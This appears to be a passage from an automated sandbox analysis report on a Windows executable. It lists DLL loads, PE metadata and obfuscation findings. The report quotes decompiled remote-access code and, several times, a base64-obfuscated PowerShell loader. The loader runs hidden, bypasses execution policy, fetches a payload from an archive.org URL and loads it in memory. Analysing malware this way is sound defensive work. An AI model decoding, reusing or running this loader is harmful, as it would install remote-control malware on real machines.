Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\System32\cmd.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\cmd.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\cmd.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\cmd.exe Section loaded: wldp.dll
Source: C:\Windows\System32\cmd.exe Section loaded: propsys.dll
Source: C:\Windows\System32\cmd.exe Section loaded: profapi.dll
Source: C:\Windows\System32\cmd.exe Section loaded: edputil.dll
Source: C:\Windows\System32\cmd.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\cmd.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\cmd.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\cmd.exe Section loaded: netutils.dll
Source: C:\Windows\System32\cmd.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\cmd.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\cmd.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\cmd.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\cmd.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\cmd.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\cmd.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\cmd.exe Section loaded: slc.dll
Source: C:\Windows\System32\cmd.exe Section loaded: userenv.dll
Source: C:\Windows\System32\cmd.exe Section loaded: sppc.dll
Source: C:\Windows\System32\cmd.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\cmd.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\cmd.exe Section loaded: pcacli.dll
Source: C:\Windows\System32\cmd.exe Section loaded: mpr.dll
Source: C:\Windows\System32\cmd.exe Section loaded: sfc_os.dll
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mlang.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: TM3utH2CsU.exe Static PE information: certificate valid
Source: TM3utH2CsU.exe Static PE information: Virtual size of .text is bigger than: 0x100000
Source: TM3utH2CsU.exe Static PE information: Image base 0x140000000 > 0x60000000
Source: TM3utH2CsU.exe Static file information: File size 2348312 > 1048576
Source: TM3utH2CsU.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x16aa00
Source: TM3utH2CsU.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: TM3utH2CsU.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: TM3utH2CsU.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: TM3utH2CsU.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: TM3utH2CsU.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: TM3utH2CsU.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: TM3utH2CsU.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: TM3utH2CsU.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: e.pdb source: powershell.exe, 00000012.00000002.2455008482.000001AF31187000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000012.00000002.1650115871.000001AF16FEA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1704147920.000001EC82CEF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdbh{o source: powershell.exe, 00000012.00000002.2455008482.000001AF31187000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdb source: powershell.exe, 00000012.00000002.2410995855.000001AF310FE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ll\System.Core.pdbDc source: powershell.exe, 00000012.00000002.2455008482.000001AF31187000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dbpdbtem.pdbEX source: powershell.exe, 00000012.00000002.2455008482.000001AF31187000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdb source: powershell.exe, 00000012.00000002.2455008482.000001AF31187000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2327989343.000001AF30E70000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000012.00000002.2455008482.000001AF31187000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ion.pdb source: powershell.exe, 00000012.00000002.2455008482.000001AF31187000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdbs\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\Servererver32 source: powershell.exe, 0000001E.00000002.1704147920.000001EC82C8A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: combine.pdb source: TM3utH2CsU.exe, 00000000.00000002.1745075290.00007FF681B4C000.00000002.00000001.01000000.00000003.sdmp, TM3utH2CsU.exe, 00000000.00000000.1351636173.00007FF681B4C000.00000002.00000001.01000000.00000003.sdmp
Source: Binary string: System.Data.Linq.pdb source: powershell.exe, 00000012.00000002.1728472486.000001AF29D0E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2481504661.000001AF314E0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: System.Core.pdbk source: powershell.exe, 00000012.00000002.2327989343.000001AF30E70000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ows\dll\System.Core.pdb source: powershell.exe, 00000012.00000002.2455008482.000001AF31187000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdb source: powershell.exe, 00000012.00000002.2455008482.000001AF31187000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbdll source: powershell.exe, 00000012.00000002.2327989343.000001AF30EBF000.00000004.00000020.00020000.00000000.sdmp
Source: TM3utH2CsU.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: TM3utH2CsU.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: TM3utH2CsU.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: TM3utH2CsU.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: TM3utH2CsU.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation
barindex
.NET source code contains method to dynamically call methods (often used by packers)
Source: 18.2.powershell.exe.1af2a0cd0e8.1.raw.unpack, ClassTestsList.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 113.2.powershell.exe.237b3bb2660.0.raw.unpack, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 113.2.powershell.exe.237b3bb2660.0.raw.unpack, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
.NET source code contains potential unpacker
Source: 113.2.powershell.exe.237b3bb2660.0.raw.unpack, Messages.cs .Net Code: Plugin System.AppDomain.Load(byte[])
Source: 113.2.powershell.exe.237b3bb2660.0.raw.unpack, Messages.cs .Net Code: Memory System.AppDomain.Load(byte[])
Source: 113.2.powershell.exe.237b3bb2660.0.raw.unpack, Messages.cs .Net Code: Memory
Found suspicious powershell code related to unpacking or dynamic code loading
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: $Codigo = 'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKydYbWV0aCcrJ29kLicrJ0luJysndm9rZShOcicrJ1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ2dyYW1EYScrJ3RhJysnTycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD$global:?
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: $Codigo = 'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKydYbWV0aCcrJ29kLicrJ0luJysndm9rZShOcicrJ1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ2dyYW1EYScrJ3RhJysnTycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD$global:?
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: $Codigo = 'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKydYbWV0aCcrJ29kLicrJ0luJysndm9rZShOcicrJ1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ2dyYW1EYScrJ3RhJysnTycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD$global:?
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: $Codigo = 'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKydYbWV0aCcrJ29kLicrJ0luJysndm9rZShOcicrJ1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ2dyYW1EYScrJ3RhJysnTycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD$global:?
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: $Codigo = 'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKydYbWV0aCcrJ29kLicrJ0luJysndm9rZShOcicrJ1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ2dyYW1EYScrJ3RhJysnTycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD$global:?
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: $Codigo = 'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKydYbWV0aCcrJ29kLicrJ0luJysndm9rZShOcicrJ1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ2dyYW1EYScrJ3RhJysnTycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD$global:?
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: $Codigo = 'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKydYbWV0aCcrJ29kLicrJ0luJysndm9rZShOcicrJ1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ2dyYW1EYScrJ3RhJysnTycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = 